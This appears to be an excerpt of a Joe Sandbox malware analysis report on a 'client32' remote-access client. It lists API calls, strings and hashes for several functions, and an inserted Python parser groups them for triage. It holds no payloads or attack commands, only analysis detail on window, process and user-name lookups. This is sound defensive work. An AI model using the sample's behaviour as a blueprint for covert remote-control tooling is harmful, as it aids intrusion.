                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
                                                                                                                                                    • API String ID: 477284662-4139260718
                                                                                                                                                    • Opcode ID: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                                                                                                    • Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
                                                                                                                                                    • Opcode Fuzzy Hash: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                                                                                                    • Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                                                                                                    • SendMessageA.USER32(00000000,0000004A,000A0036,?), ref: 1103D313
                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                                                                                    • String ID: CLTCONN.CPP$NSMW16Class
                                                                                                                                                    • API String ID: 4104200039-3790257117
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                                                                                                    • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                                                                                                    • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 490496107-2775872530
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameA.USER32(?,?,00000080), ref: 110416E7
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 11041719
                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749
                                                                                                                                                      • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                                                                                      • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                                                                      • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 110417DD
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 110417EE
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
                                                                                                                                                    • String ID: NSSWControl32$pcinssui.exe$psapi.dll
                                                                                                                                                    • API String ID: 2388757878-1455766584
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowTextLengthA.USER32(?), ref: 11023491
                                                                                                                                                    • GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 110234D7
                                                                                                                                                    • GetDlgItem.USER32(00000000,000013AB), ref: 11023521
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 11023524
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • GetDlgItem.USER32(00000000,?), ref: 1102356B
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                    • API String ID: 3823882759-1986719024
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                                                                                      • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                      • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                                                                      • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                    • LoadLibraryA.KERNEL32(secur32.dll,1EF76653,?,?,?), ref: 111470D1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
                                                                                                                                                    • timeGetTime.WINMM(?,?), ref: 111470FC
                                                                                                                                                    • timeGetTime.WINMM(?,?), ref: 11147113
                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 11147119
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                                                                                                                    • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                                                                                                                    • API String ID: 2282859717-3523682560
                                                                                                                                                    • Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                                                                                    • Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
                                                                                                                                                    • Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                                                                                    • Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 11037872
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
                                                                                                                                                    • GetBkColor.GDI32(?), ref: 11037A5C
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9
                                                                                                                                                      • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                                                                                      • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                                                                                      • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
                                                                                                                                                    • DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
                                                                                                                                                    • DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11037B49
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 649858571-0
                                                                                                                                                    • Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                                                                                    • Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
                                                                                                                                                    • Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                                                                                    • Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
                                                                                                                                                    APIs
                                                                                                                                                    • SetFocus.USER32(?), ref: 110254CE
                                                                                                                                                    • GetDlgItem.USER32(?,00001396), ref: 110254E2
                                                                                                                                                    • CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
                                                                                                                                                    • ShowCaret.USER32(00000000), ref: 11025515
                                                                                                                                                    • DestroyCaret.USER32 ref: 11025529
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Caret$CreateDestroyFocusItemShow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3189774202-0
                                                                                                                                                    • Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                                                                                    • Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
                                                                                                                                                    • Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                                                                                    • Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                                                                                      • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                                      • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                                      • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                                                    • _memmove.LIBCMT ref: 11035267
                                                                                                                                                    • _memmove.LIBCMT ref: 1103528B
                                                                                                                                                    • _memmove.LIBCMT ref: 110352C5
                                                                                                                                                    • _memmove.LIBCMT ref: 110352E1
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1103532B
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                    • String ID: deque<T> too long
                                                                                                                                                    • API String ID: 827257264-309773918
                                                                                                                                                    • Opcode ID: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                                                                                                    • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                                                                                                    • Opcode Fuzzy Hash: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                                                                                                    • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
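The function summaries above follow one fixed layout: an "APIs" list (module, arguments and call-site address per call, with "Part of subcall function" lines for calls made one level down), a "Memory Dump Source" block, and a "Similarity" block whose API ID, String ID and fuzzy hashes Joe Sandbox uses to match functions across reports. When triaging a dump like client32 it is useful to parse these entries into structured records and group functions by their direct API sequence, which exposes duplicated code such as the two deque helpers (at 110351E0 and 11019370) that only differ in addresses. The parser below is an added example for this page, not Joe Sandbox code. Its SAMPLE input is a constructed excerpt in the report's own layout built from the records on this page; the last record's Similarity block is abridged, and its API String ID is assumed (not shown on the page) to equal the first deque record's because its API ID and String ID are identical. Subcall lines are excluded from the sequence by default because the same callee (11161299 here) is listed under several parents and would blur the grouping.

```python
"""Turn Joe Sandbox 'IDA Plugin' function summaries into comparable API sequences.

Added example for this page; it is not Joe Sandbox code. SAMPLE is a
constructed excerpt in the same layout as the report entries (the last
record's Similarity block is abridged and its API String ID is an assumption).
"""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
APIs
• SetFocus.USER32(?), ref: 110254CE
• GetDlgItem.USER32(?,00001396), ref: 110254E2
• CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
• ShowCaret.USER32(00000000), ref: 11025515
• DestroyCaret.USER32 ref: 11025529
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: Caret$CreateDestroyFocusItemShow
• String ID:
• API String ID: 3189774202-0
• Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 110351E0
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
• _memmove.LIBCMT ref: 11035267
• _memmove.LIBCMT ref: 1103528B
• _memmove.LIBCMT ref: 110352C5
• _memmove.LIBCMT ref: 110352E1
• std::exception::exception.LIBCMT ref: 1103532B
• __CxxThrowException@8.LIBCMT ref: 11035340
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
• String ID: deque<T> too long
• API String ID: 827257264-309773918
• Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 11019370
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
• _memmove.LIBCMT ref: 110193F7
• _memmove.LIBCMT ref: 1101941B
• _memmove.LIBCMT ref: 11019455
• _memmove.LIBCMT ref: 11019471
• std::exception::exception.LIBCMT ref: 110194BB
• __CxxThrowException@8.LIBCMT ref: 110194D0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
• String ID: deque<T> too long
• API String ID: 827257264-309773918
"""

# One API line: optional "Part of subcall function <addr>: " prefix, then
# <name>.<MODULE>, optional "(args)", optional comma, then "ref: <call-site>".
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int                        # call-site address
    parent: Optional[int] = None    # callee address when the line is a subcall


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    source: dict = field(default_factory=dict)
    similarity: dict = field(default_factory=dict)

    @property
    def address(self) -> Optional[int]:
        """Lowest direct call-site address: a stable handle for the function."""
        direct = [c.ref for c in self.calls if c.parent is None]
        return min(direct) if direct else None

    def api_sequence(self, include_subcalls: bool = False) -> tuple:
        """Ordered MODULE!Name tuple, the feature used to compare functions."""
        return tuple(f"{c.module}!{c.name}" for c in self.calls
                     if include_subcalls or c.parent is None)


def parse_records(text: str) -> list:
    """Split report text into FunctionRecords; unknown bullets (Associated, Snapshot) are skipped."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # every record starts with its API list
            cur = FunctionRecord()
            records.append(cur)
            section = "APIs"
            continue
        if line and not line.startswith("•"):   # any other bare line is a section header
            section = line
            continue
        if cur is None or not line:
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = CALL_RE.match(body)
            if not m:
                raise ValueError(f"unparsed API line: {body!r}")
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                     int(m["parent"], 16) if m["parent"] else None))
        elif section == "Memory Dump Source" and body.startswith("Source File: "):
            file_, *rest = body[len("Source File: "):].split(", ")
            cur.source["file"] = file_
            for part in rest:                   # "Offset: 11000000", "based on PE: true"
                key, _, value = part.partition(": ")
                cur.source[key] = value
        elif section == "Similarity":
            key, _, value = body.partition(":")
            cur.similarity[key.strip()] = value.strip()
    return records


def group_by_sequence(records: list) -> dict:
    """Map each distinct direct-call sequence to the records that share it."""
    groups: dict = {}
    for r in records:
        groups.setdefault(r.api_sequence(), []).append(r)
    return groups


if __name__ == "__main__":
    for seq, members in group_by_sequence(parse_records(SAMPLE)).items():
        addrs = ", ".join(f"{m.address:08X}" for m in members)
        print(f"{len(members)} function(s) at {addrs}: {' -> '.join(seq)}")
```

Feed the parser the whole "Joe Sandbox IDA Plugin" section of a report rather than SAMPLE and the groups give a quick inventory of distinct behaviours per dump; the Instruction Fuzzy Hash kept in `similarity` is the value to pivot on when checking whether a function recurs in other NetSupport-based samples.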
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 11019370
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
• _memmove.LIBCMT ref: 110193F7
• _memmove.LIBCMT ref: 1101941B
• _memmove.LIBCMT ref: 11019455
• _memmove.LIBCMT ref: 11019471
• std::exception::exception.LIBCMT ref: 110194BB
• __CxxThrowException@8.LIBCMT ref: 110194D0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
